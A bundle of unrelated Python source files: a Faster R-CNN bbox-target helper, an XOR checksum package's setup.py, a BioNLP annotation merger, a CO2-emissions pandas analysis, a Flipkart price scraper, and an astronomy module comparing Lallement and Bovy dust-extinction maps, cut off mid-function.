bbox_inside_weights = np.zeros(bbox_targets.shape, dtype=np.float32)
inds = np.where(clss > 0)[0]
for ind in inds:
cls = clss[ind]
start = 4 * cls
end = start + 4
bbox_targets[ind, start:end] = bbox_target_data[ind, 1:]
bbox_inside_weights[ind, start:end] = cfg.TRAIN.BBOX_INSIDE_WEIGHTS
return bbox_targets, bbox_inside_weights
|
from setuptools import setup
NAME = 'XOR_CheckSum_zsd'
VERSION = '1.0.7'
URL = 'https://github.com/zhangsheng377/XOR_CheckSum_zsd'
KEYWORDS = 'XOR checksum string zsd'
EMAIL = '435878393@qq.com'
DESCRIPTION = 'XOR_CheckSum tools'
LONG_DESCRIPTION = '''
\>\>\> from XOR_CheckSum import xor_checksum_string
\>\>\> xor_checksum_string('CCICA,0,00')
123
\>\>\> hex(xor_checksum_string('CCICA,0,00'))
'0x7b'
\>\>\> hex(xor_checksum_string('CCICA,0,00', encoding="utf-8"))
'0x7b'
\>\>\> hex(xor_checksum_string('CCICA,0,00', encoding="utf-16"))
'0x7a'
'''
REQUIRES = []
PACKAGES = ['XOR_CheckSum']
setup(
name=NAME,
author='zhangsheng377',
license='MIT',
zip_safe=False,
url=URL,
version=VERSION,
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
author_email=EMAIL,
keywords=KEYWORDS,
install_requires=REQUIRES,
packages=PACKAGES,
classifiers=[
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
)
|
#!/usr/bin/env python
# -*- Mode: Python; tab-width: 4; indent-tabs-mode: nil; coding: utf-8; -*-
# vim:set ft=python ts=4 sw=4 sts=4 autoindent:
from __future__ import with_statement
'''
Merge BioNLP Shared Task annotation format into a single annotation file.
find data -name '*.a1' -o -name '*.a2' -o -name '*.rel' -o -name '*.co' \
| ./merge.py
Author: Pontus Stenetorp
Version: 2011-01-17
'''
from collections import defaultdict
from os.path import join as join_path
from os.path import split as split_path
from shlex import split as shlex_split
from sys import stderr, stdin
from subprocess import Popen, PIPE
try:
from argparse import ArgumentParser
except ImportError:
from os.path import basename
from sys import path as sys_path
# We are most likely on an old Python and need to use our internal version
sys_path.append(join_path(basename(__file__), '../server/lib'))
from argparse import ArgumentParser
### Constants
#TODO: Add to options?
UNMERGED_SUFFIXES=['a1', 'a2', 'co', 'rel']
#TODO: Add to options?
MERGED_SUFFIX='ann'
ARGPARSER = ArgumentParser(description=("Merge BioNLP'11 ST annotations "
'into a single file, reads paths from stdin'))
ARGPARSER.add_argument('-w', '--no-warn', action='store_true',
help='suppress warnings')
#ARGPARSER.add_argument('-d', '--debug', action='store_true',
# help='activate additional debug output')
###
def keynat(string):
'''
http://code.activestate.com/recipes/285264-natural-string-sorting/
'''
it = type(1)
r = []
for c in string:
if c.isdigit():
d = int(c)
if r and type( r[-1] ) == it:
r[-1] = r[-1] * 10 + d
else:
r.append(d)
else:
r.append(c.lower())
return r
def main(args):
argp = ARGPARSER.parse_args(args[1:])
# ID is the stem of a file
id_to_ann_files = defaultdict(list)
# Index all ID;s before we merge so that we can do a little magic
for file_path in (l.strip() for l in stdin):
if not any((file_path.endswith(suff) for suff in UNMERGED_SUFFIXES)):
if not argp.no_warn:
import sys
print >> sys.stderr, (
'WARNING: invalid file suffix for %s, ignoring'
) % (file_path, )
continue
dirname, basename = split_path(file_path)
id = join_path(dirname, basename.split('.')[0])
id_to_ann_files[id].append(file_path)
for id, ann_files in id_to_ann_files.iteritems():
#XXX: Check if output file exists
lines = []
for ann_file_path in ann_files:
with open(ann_file_path, 'r') as ann_file:
for line in ann_file:
lines.append(line)
with open(id + '.' + MERGED_SUFFIX, 'w') as merged_ann_file:
for line in lines:
merged_ann_file.write(line)
if __name__ == '__main__':
from sys import argv
exit(main(argv))
|
# imports
#region
import os
import pyreadstat
import pandas as pd
import numpy as np
from statsmodels.stats.weightstats import DescrStatsW
from sklearn.linear_model import LinearRegression
import statsmodels.api as sm
import statsmodels.formula.api as smf
import seaborn as sns
import matplotlib as mpl
mpl.use('Agg')
import matplotlib.pyplot as plt
from libs.utils import *
from libs.plots import *
from libs.extensions import *
plt.ioff()
#endregion
root = 'D:\\projects\\fakta-o-klimatu\\work\\111-emise-svet-srovnani\\data'
edgar_files = ['CH4', 'CO2_excl_short-cycle_org_C', 'CO2_org_short-cycle_C', 'N2O']
ef = edgar_files[0]
data = []
for ef in edgar_files:
logger(ef)
ey = 2018 if ef == 'CO2_excl_short-cycle_org_C' else 2015
frame = pd.read_excel(f'{root}\\edgar_v5.0\\v50_{ef}_1970_{ey}.xls', sheet_name='TOTALS BY COUNTRY',
header=9)
frame = frame[['ISO_A3'] + list(range(1970, ey + 1))].rename(columns={'ISO_A3': 'code'}).set_index('code')
data.append(frame)
# data.append(np.sum(frame.T, axis=1).rename(ef))
df = data[1]
# so here I have edgar CO2 up to 2018
# what do I want to do with it?
countries = pd.read_csv('D:\\projects\\fakta-o-klimatu\\work\\emission-intensity\\countries.csv')
countries.show()
countries = countries.rename(columns={'country_name': 'country', 'final_region': 'cont', 'final_region_en': 'cont_en',
'second_chart_region': 'region'}).drop(columns=['world_bank_region', 'wiki_region', 'final_region_full'])
regions = countries[['code', 'final_region']].rename(columns={'final_region': 'region'})
selected = ['Čína', 'Evropská unie', 'Indie', 'Rusko', 'Spojené státy americké']
regions = regions[regions.region.isin(selected)].copy()
# what about Great Britain?
regions = regions.query('code != "GBR"').reset_index(drop=True).copy()
regions.shape
regions.show()
df = pd.merge(regions, df.reset_index())
df.show()
cze = df.iloc[[0]].copy()
cze.loc[0, 'region'] = 'Česká republika'
co2 = pd.concat([df, cze]).drop(columns=['code']).set_index('region').groupby('region').apply(lambda x: x.sum(axis=0)) \
.sort_index()
import world_bank_data as wb
pop = wb.get_series('SP.POP.TOTL', id_or_value='id')
pop = pop.unstack().reset_index().drop(columns=['Series']).rename(columns={'Country': 'code'})
pop = pd.merge(regions, pop)
pop.show()
cze = pop.query('code == "CZE"').copy()
cze.loc[0, 'region'] = 'Česká republika'
pop = pd.concat([pop, cze]).drop(columns=['code']).set_index('region').groupby('region').apply(lambda x: x.sum(axis=0))
pop = pop[[str(i) for i in range(1970, 2019)]].sort_index()
pop.columns = [int(i) for i in pop.columns]
co2_per_capita = 1e3 * co2 / pop
co2 = co2 / 1e6
covered = co2[2018].sum()
world = data[1][2018].sum()
covered / world
output = 'D:\\projects\\fakta-o-klimatu\\work\\respekt-data\\regiony\\'
co2.to_csv(output + 'regiony_co2.csv')
pop.to_csv(output + 'regiony_pop.csv')
co2_per_capita.to_csv(output + 'regiony_co2_per_capita.csv')
df = pd.merge(regions, df.reset_index(), how='right')
df['region'] = df['region'].fillna('Ostatní')
co2 = df.drop(columns=['code']).set_index('region').groupby('region').apply(lambda x: x.sum(axis=0)).sort_index()
co2 = co2 / 1e6
ax = co2.T.plot.area(lw=0)
ax.set(xlabel='Rok', ylabel='Gt CO2', title='Světové roční emise CO2')
ax.show()
co2.to_csv(output + 'regiony_co2.csv')
|
import requests
from bs4 import BeautifulSoup
import lxml
url = 'https://www.flipkart.com/msi-gf63-thin-core-i5-10th-gen-8-gb-1-tb-hdd-windows-10-home-4-gb-graphics-nvidia-geforce-gtx-1650-max-q-60-hz-10scxr-1618in-gaming-laptop/p/itm76993f27ad4bd?pid=COMG2K9ZJWWV2BGX&lid=LSTCOMG2K9ZJWWV2BGXWYR6AP&marketplace=FLIPKART&store=6bo%2Fb5g&srno=b_1_2&otracker=hp_omu_Top%2BOffers_3_4.dealCard.OMU_XI2Q41K7XRAJ_3&otracker1=hp_omu_PINNED_neo%2Fmerchandising_Top%2BOffers_NA_dealCard_cc_3_NA_view-all_3&fm=neo%2Fmerchandising&iid=en_88xLC9tozPrlDC3p08xWvF4be%2F6nOdXkruYGuVEr5o%2B1AJkflbHBXnuhJkfHoUbEVfGT0brMXc7Q5HqI%2FaaGdQ%3D%3D&ppt=hp&ppn=homepage&ssid=449d8hrxog0000001628232917865'
def get_url_link(url):
headers = {
"User-Agent": 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36',
"Accept-Language": "en",
}
r = requests.get(url, headers=headers)
soup = BeautifulSoup(r.text, "lxml")
title = soup.find("span", {"class": "B_NuCI"}).get_text()
price = float(soup.find("div", {"class": "_30jeq3 _16Jk6d"}).get_text()[1:].replace(',', ''))
return title,price
print(get_url_link(url))
|
#
# compareExtinctions.py
#
# Authors: Will Clarkson (UM-Dearborn) and Alessandro Mazzi (INAF)
# Started 2021-04-02
#
#
# Use Bovy's dustmaps and Alessandro Mazzi's STILISM_LOCAL.py to
# compare the lallement and bovy extinction predictions for a
# particular sight line.
#
# Bovy et al. and stilism_local - must be included
import mwdust
import stilism_local
# If we want to query planck2d for every sightline, not just those we
# tabulated
try:
from dustmaps.planck import PlanckQuery
PLANCK_2D = PlanckQuery()
except:
PLANCK_2D = None
# Standard methods
import numpy as np
# for timings
import time
# For filename operations and optional directory creation
import os, glob
# To space the samples out in equatorial rather than galactic
from astropy.coordinates import SkyCoord
from astropy import units as u
from astropy.io import fits
# To determine spacings for samples about a central sight line
import healpy as hp
import matplotlib.pylab as plt
import matplotlib.gridspec as gridspec
plt.ion()
class lineofsight(object):
"""Evaluates E(B-V) vs distance for a particular line of sight. The
bovy et al. 2019 combined map can be passed in (as argument objBovy)
or can be re-imported here."""
def __init__(self, l=0., b=4., \
distMaxPc=8000, distMinPc=0.5, distStepPc=10, \
distances=np.array([]), \
objBovy = None, Rv=3.1, \
objL19=None, \
distMaxCoarsePc = 17500., \
nDistBins = 400,
map_version='19'):
# Sight line, max distance
self.l = l
self.b = b
self.distMaxPc = distMaxPc
self.distMinPc = distMinPc
self.distStepPc = distStepPc
# Maximum overall distance, *IF* we are using a coarser set of
# bins for the bovy et al. distances than for the L19
# distances.
self.distMaxCoarsePc = distMaxCoarsePc
# If we are generating distances to fit in a larger scheme
# (where we need the same number of bins in every sight line),
# we will need to enforce the total number of bins. If we're
# letting stilism_local generate distances, this quantity is
# ignored.
self.nDistBins = nDistBins
# Conversion factor from A_5555 to E(B-V)
self.Rv=Rv
# Distances generated by stilism_local, maximum distance along
# this sight line for stilism_local
if np.size(distances) > 0:
self.distsPc = np.copy(distances)
else:
self.distsPc = np.array([])
self.distLimPc = 1e9 # initialize very high
# Map-relevant quantities follow.
self.planckValue = 0. # planck 2d query at this sight line.
# bovy et al. distance model - if not initialised
if objBovy is None:
self.objBovy = mwdust.Combined19()
else:
self.objBovy = objBovy
# extinction evaluates
self.ebvL19 = np.array([])
self.ebvBovy = np.array([])
# Set up L19 map
# the version of LallementDustMap must be either '18' or '19',
# as string
if objL19 is None:
self.lallementMap \
= stilism_local.LallementDustMap(version=map_version,Rv=Rv)
else:
self.lallementMap = objL19
def generateDistances(self, Verbose=False):
"""Generates a distance array appropriate for this sight
line. Fine-grained distances are used over the range in which L+19 is
defined, then switches over to a coarse-grained set of distances for
Bovy et al.
"""
# Generate an array of "fine-grained" distances
distsFine = stilism_local.generate_distances(self.distMaxPc,
self.distMinPc, \
self.distStepPc)
# Find the maximum distance that fits inside the L19
# volume. Currently the routine in stilism_local returns the
# boolean and the xyz coords since those are needed for the
# interpolation. We don't need those quantities here, though.
distMax, _, _ = self.lallementMap.find_max_distance(self.l, self.b, \
distsFine)
# OK now we set the maximum distance for the "fine" set of the
# distances, adding a few steps onto the end to allow for
# neighboring sight lines to take different paths through the
# cube.
self.distLimPc = distMax + 5*self.distStepPc
# Now we generate the "fine" and "coarse" distance arrays and
# abut them together.
distsClose = stilism_local.generate_distances(self.distLimPc, \
self.distMinPc, \
self.distStepPc)
# we have to determine the coarse step size dynamically too.
nBinsFar = self.nDistBins - np.size(distsClose)
# What we do if we sent in too few bins to begin with needs
# some thought... I think for the moment it's better to warn
# and extend the footprint in this case. We use a conditional
# so that we can put the warning in (rather than use np.min()
# in the above line). We could put in a conditional for
# whether we actually want to do this (rather than just
# crashing), but for the moment let's ensure this actually
# does run all the way through...
if nBinsFar < 0:
print("generateDistances WARN - nFine > nTotal. Extending the coarse array to 10 elements. This may not be what you want...")
nBinsFar = 10
# We want the arrays to mesh more or less seamlessly. Here's
# how: we use linspace to take the maximum close distance out
# to the maximum total distance, WITHOUT the endpoints. Then
# we find the step resulting and shift the array by that
# distance.
distsFar = np.linspace(np.max(distsClose), self.distMaxCoarsePc, \
nBinsFar, endpoint=False)
# Update the step size and shift the coarse array by one step
self.distStepCoarsePc = distsFar[1] - distsFar[0]
distsFar += self.distStepCoarsePc
#distMinFar = np.max(distsClose)+self.distStepCoarsePc
#distsFar = np.linspace(distMinFar, self.distMaxCoarsePc, nBinsFar, \
# endpoint=True)
self.distsPc = np.hstack(( distsClose, distsFar ))
# Ensure the limits sent to stilism_local are consistent with
# this. If we're sending stilism a distance array then those
# values should be ignored anyway, but it doesn't hurt to make
# them consistent.
self.distMinPc = np.min(self.distsPc)
self.distMaxPc = np.max(self.distsPc)
self.distStepPc = (self.distMaxPc - self.distMinPc) \
/ np.size(self.distsPc)
if Verbose:
nbins = np.size(self.distsPc)
stepFine = distsClose[1] - distsClose[0]
stepFar = distsFar[1] - distsFar[0]
print("lineofsight.generateDistances INFO - nbins %i, fine step %.3f, coarse step %.3f" % (nbins, stepFine, stepFar))
def getLallementEBV(self):
"""Evaluates the Lallement+19 extinction"""
# we supply the get_ebv_lallement routine with our array of
# distances. If it's zero length, get_ebv_lallement will
# generate its own. Otherwise it uses the values we
# supply. This leads to an apparently redundant set of
# keywords in the call.
l19, dists, distLim \
= self.lallementMap.get_ebv(self.l, self.b, \
self.distMaxPc, \
self.distMinPc, \
self.distStepPc, \
distances=self.distsPc)
# Pass the l19 values, converted to E(B-V)
## new 2021-04-05: not needed since LallementDustMap handles conversion automatically
#self.ebvL19 = l19 / self.Rv
self.ebvL19 = l19
# pass the distance array generated to the instance, IF it
# wasn't already generated.
if np.size(self.distsPc) < 1:
self.distsPc = np.copy(dists)
self.distLimPc = np.copy(distLim)
def getBovyEBV(self):
"""Evaluates Bovy et al. E(B-V) for this sight line"""
self.ebvBovy = self.objBovy(self.l, self.b, self.distsPc/1000.)
# extinctions cannot be negative
bLo = self.ebvBovy < 0.
self.ebvBovy[bLo] = 0.
def getPlanck2D(self):
"""Gets the 2D planck value of the extinction for this sightline, if
dustmaps is present."""
# Do nothing if the dustmaps.planck is not on the system
if PLANCK_2D is None:
return
# planck2d expects astropy skycoo coordinates. Although the
# method that called this instance may already have the coords
# developed, it should be quick to generate one here.
coo = SkyCoord(self.l*u.deg, self.b*u.deg, frame='galactic')
self.planckValue = PLANCK_2D(coo)
def showLos(self, ax=None, alpha=1.0, lw=1, zorder=5, \
noLabel=False, \
showPoints=False):
"""Adds a plot for the line of sight to the current axis"""
# start an axis if one was not supplied
newAx = False
if ax is None:
fig1 = plt.figure(1)
fig1.clf()
ax = fig1.add_subplot(111)
newAx = True
# hack for the labels
labl19 = 'L+19'
lablBov = 'Bovy'
if noLabel:
labl19 = ''
lablBov = ''
# show the points?
marker=None
markerB=None
if showPoints:
marker='o'
markerB='s'
b19 = self.distsPc <= self.distLimPc
dumLlo = ax.plot(self.distsPc[b19], self.ebvL19[b19], 'k-', \
label=labl19, \
alpha=alpha, lw=lw, zorder=zorder, \
marker=marker, ms=2)
dumLhi = ax.plot(self.distsPc[~b19], self.ebvL19[~b19], 'k--', \
alpha=alpha, lw=lw, zorder=zorder, \
marker=marker, ms=1)
dumBo = ax.plot(self.distsPc, self.ebvBovy, 'r-', \
label=lablBov, \
alpha=alpha, lw=lw, zorder=zorder+1, \
marker=markerB, ms=1)
# if we are doing a new axis, decorate it
if not newAx:
return
self.decorateAxes(ax)
def showDistMax(self, ax=None):
"""Draw an indicator showing the maximum distance for L19"""
if ax is None:
return
if self.distLimPc > self.distMaxPc:
return
blah = ax.axvline(self.distLimPc, ls='--', color='k', alpha=0.3)
#ymax = np.max(self.ebvL19)
#dum = ax.plot([self.distLimPc, self.distLimPc], [0., ymax], \
#'k--', alpha=0.3)
def decorateAxes(self, ax=None):
"""One-liner to decorate the current plot axes appropriately for the
extinction vs distance plot"""
if ax is None:
return
ax.set_xlabel('Distance (pc)')
ax.set_ylabel('E(B-V)')
ax.grid(which='both', zorder=1, color='0.5', alpha=0.5)
ax.set_title('l=%.2f, b=%.2f' % (self.l, self.b))
#### Test the comparison
def testOneSightline(l=0., b=4., Rv=3.1, useCoarse=False):
"""Try a single sight line"""
# Import the bovy et al. map so we don't have to re-initialize it
# for each sight-line
combined19 = mwdust.Combined19()
los = lineofsight(l, b, objBovy=combined19, Rv=Rv)
if useCoarse:
los.generateDistances(Verbose=True)
los.getLallementEBV()
los.getBovyEBV()
# show the line of sight
los.showLos(showPoints=True)
def hybridSightline(lCen=0., bCen=4., \
nl=4, nb=4, \
maxPc=9000., minPc=0.5, stepPc=25, \
nside=64, \
pixFillFac=1.0, collisionArcmin=2., \
pctUpper=75., pctLower=25., \
Rv=3.1, \
distFrac=1., diffRatioMin=0.5, \
setLimDynamically=False, \
minEBV=1.0e-3, \
minDistL19=1000., \
returnValues = False, \
tellTime=True, \
doPlots=True, \
figName='', \
useTwoBinnings=True, \
nBinsAllSightlines = 500, \
distancesPc = np.array([]), \
hpid=-1, nested=False, \
objBovy=None, \
objL19=None, \
versionL19='19', \
dmaxL19=1e6,\
bridgeL19 = False, \
bridgeWidthL19 = 1000, \
planckMap=None, \
planckUpperLim = 15.):
"""Samples the Bovy et al. and Lallement et al. 2019 E(B-V) vs
distance maps, constructed as the median E(B-V) vs distance curve
over nl x nb samples about the central sight line.
if "returnValues" is set, this returns the E(B-V), distances,
scale factor, and max distance for L19.
A modified version of Alessandro Mazzi's
"stilism_local.py" is used to query Lallement et al. 2019.
REQUIREMENTS beyond the standard numpy and matplotlib:
stilism_local.py: Currently, the script "stilism_local.py" must be
accessible on PYTHONPATH (or be in the current working directory),
and it must be able to locate the "stilism_cube_2.h5" file.
mwdust - Bovy's 3D extinction models and sampler.
healpy - must be present on the system (to convert NSIDE into a
pixel area). If mwdust successfully installed on your system then
you probably already have this.
If you want to query Planck in all the sight lines, Gregory
Green's "mwdust" is also required.
MORE INFO, ARGUMENTS:
The median over all the samples is taken as the E(B-V) curve for
each of the two models. The Lallement et al. 2019 model is scaled to
match the Bovy et al. model at a transition distance. This transition
distance can be determined dynamically or set to a fixed fraction of
the maximum distance of validity of the Lallement et al. 2019
model.
ARGUMENTS:
lCen, bCen = central line of sight, in degrees.
nl, nb = number of points in l, b about which to draw
samples. (The samples will be drawn in a grid (nl x nb) about the
central line of sight.)
maxPc, minPc, stepPc = max, min, stepsize for the distance in
parsecs along the line of sight. (minPc should be small but not
zero: 0.5 pc seems a sensible level to use.)
nside = Healpix NSIDE (used to estimate the side-length for the
square region sampled)
pixFillFrac = fraction of the side-length of the healpix to sample
with our pointings (the default is to sample out to the corners of
the pixel).
collisionArcmin = closest distance a sample can fall to the line
of sight without being rejected as a duplicate of the central line
of sight.
pctUpper, pctLower = lower and upper percentiles for displaying
the variation of E(B-V) within the healpix. (May be ambiguous to
interpret for small (nl x nb).)
Rv = scale factor converting L19's A_555 to E(B-V). Default 3.1.
distFrac = fraction of the L19 maximum distance to use as a
default for the overlap point between L19 and Bovy.
diffRatioMin = minimum fractional difference btween L19 and Bovy
for the two predictions to be considered "discrepant". Used if
estimating the overlap distance dynamically.
setLimDynamically: setting the overlap distance dynamically?
minEBV = minimum value for the Bovy extinction. Bovy points below
this value are ignored.
minDistL19 = minimum acceptable dynamically determined overlap
distance. If the dynamically determined distance is less than this
value, the default (distFrac x max(dist_L19) is used instead.
tellTime = Report screen output, including the timing.
doPlots = prepare plots?
returnValues = return the extinction and distances?
figName = filename for output figure file. If length < 3, no
figure is saved to disk.
useTwoBinnings: Uses finer distance bins for L19 than for Bovy et al., such that the total number of bins is the same for all sight lines.
nBinsAllSightlines = number of bins total for the sightlines
distancesPc = input array of distances in parsecs. If supplied, all the clever distance methods here are ignored in favor of the input distances.
hpid: if >0, then a healpix ID is being supplied, and will
override the choice of l, b. The field center is constructed from
this healpix id.
nested: if using hpids, is this with NESTED? Default is False
because sims_maf seems to use RING by default.
objBovy = bovy et al. dust object. Defaults to None and is
re-initialized in this method. But, could be passed in here too to
save time.
objL19 = Lallement et al. map object. Defaults to None and is
re-initialized in this method using the Rv and versionL19
arguments
versionL19 = Version of Lallement et al. to use if we are
re-initializing L19 here.
dmaxL19 = Maximum distance for Lallement et al. profile. Defaults
to a very large number so the profile up to the intrinsic maximum
distance of the map is used. Setting to zero disables Lallement's
map. Setting instead to a negative value will use Bovy alone if
non-zero for the line of sight, otherwise only Lallement.
bridgeL19 - if True, L19 is taken as "correct", and the E(B-V) is
extended from the value of L+19 at the maximum distance, to the
value of Bovy et al. at the maximum distance plus distance
bridgeWidthL19
bridgeWidthL19 - the distance interval over which the above
extension is to take place.
planckMap = healpix 2d map of Planck E(B-V) predictions. Ignored
if the query coords were not healpix, OR if Green's "dustmaps" is
available on the system.
planckUpperLim = upper limit for planck E(B-V) to be considered
"sensible"
EXAMPLE CALL:
compareExtinctions.hybridSightline(0, 4, figName='test_l0b4_ebvCompare.png', nl=5, nb=5, tellTime=True)
"""
# For our timing report
t0 = time.time()
# generate samples in l, b to sample a typical healpix
pixSideDeg = hp.nside2resol(nside, arcmin=True) / 60.
# how far to the edge of the pixel do we go in our samples?
pixEdge = np.min([pixFillFac, 1.0])
# now we generate the grid of samples
dL = pixSideDeg * pixEdge * np.linspace(-1., 1., nl, endpoint=True)
dB = pixSideDeg * pixEdge * np.linspace(-1., 1., nb, endpoint=True)
# create meshgrid and ravel into 1D arrays
ll, bb = np.meshgrid(dL, dB)
# convert the field center into equatorial so that we can generate
# the samples within the healpix
planckCen = 0.
if hpid < 0:
cooGAL = SkyCoord(lCen*u.deg, bCen*u.deg, frame='galactic')
raCen = cooGAL.icrs.ra.degree
deCen = cooGAL.icrs.dec.degree
else:
raCen, deCen = hp.pix2ang(nside, hpid, nested, lonlat=True)
cooEQ = SkyCoord(raCen*u.degree, deCen*u.degree, frame='icrs')
lCen = cooEQ.galactic.l.degree
bCen = cooEQ.galactic.b.degree
# fudge for wraparound, to use the same scheme as the samples
if lCen > 180:
lCen -= 360.
# do we have a planck map?
if planckMap is not None:
planckCen = planckMap[hpid]
vRA = ll.ravel() + raCen
vDE = bb.ravel() + deCen
# Ensure the coords of the samples actually are on the sphere...
bSampl = (vDE >= -90.) & (vDE <= 90.)
vRA = vRA[bSampl]
vDE = vDE[bSampl]
cooSamples = SkyCoord(vRA*u.deg, vDE*u.deg, frame='icrs')
vL = np.asarray(cooSamples.galactic.l.degree)
vB = np.asarray(cooSamples.galactic.b.degree)
# handle the wraparound
bLhi = vL > 180.
vL[bLhi] -= 360.
#vL = ll.ravel() + lCen
#vB = bb.ravel() + bCen
# knock out any points that are closer than distanceLim to the
# central sight line
offsets = (vL-lCen)**2 + (vB - bCen)**2
bSamplesKeep = (offsets*3600. > collisionArcmin**2) & \
(vB >= -90.) & (vB <= 90.)
if np.sum(bSamplesKeep) < 1:
print("hybridSightline WATCHOUT - no samples kept. Check your line of sight coordinates are valid.")
return
vL = vL[bSamplesKeep]
vB = vB[bSamplesKeep]
# OK now we can proceed. First build the line of sight for the
# center, then repeat for the nearby sight lines. If we already
# initialized the bovy dust object somewhere else, we can pass it
# in. If not initialized, then we initialize here.
if objBovy is None:
combined19 = mwdust.Combined19()
else:
combined19 = objBovy
# L+19 object-oriented map - can be passed in
if objL19 is None:
L19map \
= stilism_local.LallementDustMap(version=versionL19,Rv=Rv)
else:
L19map = objL19
# for our timing report: how long did it take to get this far?
t1 = time.time()
# now build the line of sight
losCen = lineofsight(lCen, bCen, maxPc, minPc, stepPc, \
objBovy=combined19, Rv=Rv, \
objL19=L19map, \
nDistBins=nBinsAllSightlines, \
distances=distancesPc)
# If a distances array was not supplied, AND we want to use our
# two-binning scheme to generate the distances, then generate the
# distances.
if useTwoBinnings and np.size(distancesPc) < 1:
losCen.generateDistances(Verbose=tellTime)
losCen.getLallementEBV()
losCen.getBovyEBV()
losCen.getPlanck2D()
# Set up a figure...
if doPlots:
fig1 = plt.figure(1, figsize=(12,6))
fig1.clf()
fig1.subplots_adjust(wspace=0.3, hspace=0.3)
# let's try using gridspec to customize our layout
gs = fig1.add_gridspec(nrows=2, ncols=3)
ax1 = fig1.add_subplot(gs[:,0:2])
# ax1=fig1.add_subplot(121)
losCen.showLos(ax=ax1, alpha=0.1, lw=2, zorder=10, noLabel=True)
losCen.decorateAxes(ax1)
losCen.showDistMax(ax1)
## Show the planck prediction if we have it
#if losCen.planckValue > 0:
# ax1.axhline(losCen.planckValue, ls='--', \
# label='Planck 2D', color='g')
# construct arrays for all the samples as a function of
# distance. We'll do this vstack by vstack.
stackDist = np.copy(losCen.distsPc) # to ensure they're all the same...
stackL19 = np.copy(losCen.ebvL19)
stackBovy = np.copy(losCen.ebvBovy)
# Any 2D maps we use will only have a single value for each LOS.
stackPlanck2D = np.array([losCen.planckValue])
# now loop through the samples. We pass in the same distance array
# as we used for the central line of sight, IF we are using our
# two-binning scheme.
for iSample in range(np.size(vL)):
distsInput = np.copy(distancesPc) # use input distances if any
# were given.
if useTwoBinnings:
distsInput = losCen.distsPc
losThis = lineofsight(vL[iSample], vB[iSample], \
maxPc, minPc, stepPc, \
objBovy=combined19, \
objL19=L19map, \
Rv=Rv, \
distances=distsInput)
losThis.getLallementEBV()
losThis.getBovyEBV()
losThis.getPlanck2D()
#if doPlots:
# # Show the planck prediction if we have it
# if losThis.planckValue > 0:
# ax1.axhline(losThis.planckValue, ls='--', \
# label='', color='g')
#if doPlots:
# losThis.showLos(ax=ax1, alpha=0.3, lw=1, zorder=3)
# accumulate to the stacks so that we can find the statistics
# across the samples
stackDist = np.vstack(( stackDist, losThis.distsPc ))
stackL19 = np.vstack(( stackL19, losThis.ebvL19 ))
stackBovy = np.vstack(( stackBovy, losThis.ebvBovy ))
# stack any 2D maps we have
stackPlanck2D = np.hstack(( stackPlanck2D, losThis.planckValue ))
# now compute the statistics. We do the median and the upper and
# lower percentiles.
distsMed = np.median(stackDist, axis=0)
ebvL19Med = np.median(stackL19, axis=0)
ebvBovyMed = np.median(stackBovy, axis=0)
# add any 2D extinction arrays we're using. Note that along some
# sightlines (like 0,0), Planck produces very high E(B-V)
# predictions - like 300. So set an upper limit.
bPlanck = stackPlanck2D < planckUpperLim
planck2DMed = 0.
if np.sum(bPlanck) > 0:
planck2DMed = np.median(stackPlanck2D[bPlanck])
# If dustmaps is not on this system, then substitute in the planck
# map at the central LOS if one was supplied.
if planck2DMed < 1e-5 and planckCen is not None:
planck2DMed = np.copy(planckCen)
# find the scale factor for the Rv factor that causes L19 to line
# up with Bovy et al. along the sight line, out to our desired
# comparison distance.
# We set a default comparison point: some fraction of the maximum
# distance along this sight line for which we have the L+19 model.
distCompare = losCen.distLimPc * distFrac
# Use max distance provided by the user if required.
usemaxdist = False
if 0. <= dmaxL19 < losCen.distLimPc:
distCompare = dmaxL19
usemaxdist=True
if tellTime:
print("compareExtinctions.hybridSightline INFO - Using user provided max dist for L+19.")
elif dmaxL19 < 0: # replaced "== -1" with "<0"
# Specify that distance should not be changed by other operations
usemaxdist=True
# Do not use Lallement if Bovy has non-zero values
if ebvBovyMed.sum()!=0:
distCompare = 0
# else use the full extent of the profile
# elif dmaxL19<0:
# raise NotImplemented("The value of dmax has to be either -1 or >=0, currently {}.".format(dmaxL19))
if usemaxdist and doPlots:
ax1.axvline(distCompare,color='r',linestyle='dotted',label='dmaxL19')
# We can also try to set the decision distance dynamically. Here I
# find all the distances for which the L+19 extinction is within
# fraction "diffRatioMin" of the Bovy et al. extinction, and find
# the maximum distance for which the two sets are this close. If
# that distance is less than some cutoff ("minDistL19") then the
# dynamically estimated max distance is discarded.
if setLimDynamically and not usemaxdist:
bNear = (distsMed <= losCen.distLimPc) & \
(ebvL19Med > 0) & (ebvBovyMed > 0 ) & \
(np.abs(ebvBovyMed / ebvL19Med - 1.0) < diffRatioMin)
if np.sum(bNear) > 0:
# what minimum distance satisfied this expression?
distMinCalc = np.max(distsMed[bNear])
# Only apply the revised limit if it is farther than our
# desired minimum.
if distMinCalc > minDistL19:
distCompare = distMinCalc
# now we set our scale factor based on comparison to Bovy. Some
# regions of Bovy still produce zero E(B-V) for all distances, so
# we set a minimum (if bovy AT THE COMPARISON POINT is below our
# threshold minEBV, then we do no scaling).
rvFactor = 1. # our default: no scaling.
iMaxL19 = np.argmin(np.abs(distsMed - distCompare))
if ebvBovyMed[iMaxL19] > minEBV:
rvFactor = ebvL19Med[iMaxL19] / ebvBovyMed[iMaxL19]
# 2021-04-05 WIC - if we have the planck2d map to hand, then for
# the cases where Bovy does not seem to have coverage, scale L19
# to the median Planck value.
else:
if planck2DMed > 0. and distCompare > 0:
rvFactor = ebvL19Med[iMaxL19] / planck2DMed
RvScaled = Rv * rvFactor
### Merge the two median curves. This will be our E(B-V) curve
### with distance.
ebvHybrid = np.copy(ebvBovyMed)
b19 = distsMed < distCompare
ebvL19scaled = ebvL19Med/rvFactor
# 2021-04-07 If the user prefers to accept L+19 and extend it to
# meet bovy et al. I think it happens here - we change the meaning
# of ebvL19Scaled (to ebv19 "replaced"):
if bridgeL19 and distCompare > 0 and ebvBovyMed[iMaxL19] > minEBV:
distRight = np.min([distCompare + bridgeWidthL19, \
np.max(distsMed)])
if tellTime:
print("compareExtinctions.hybridSightline INFO - bridging L19 to bovy et al. 19 from distance %.1f - %.1f" % (distCompare, distRight))
# find the nearest values of the two extinctions to use
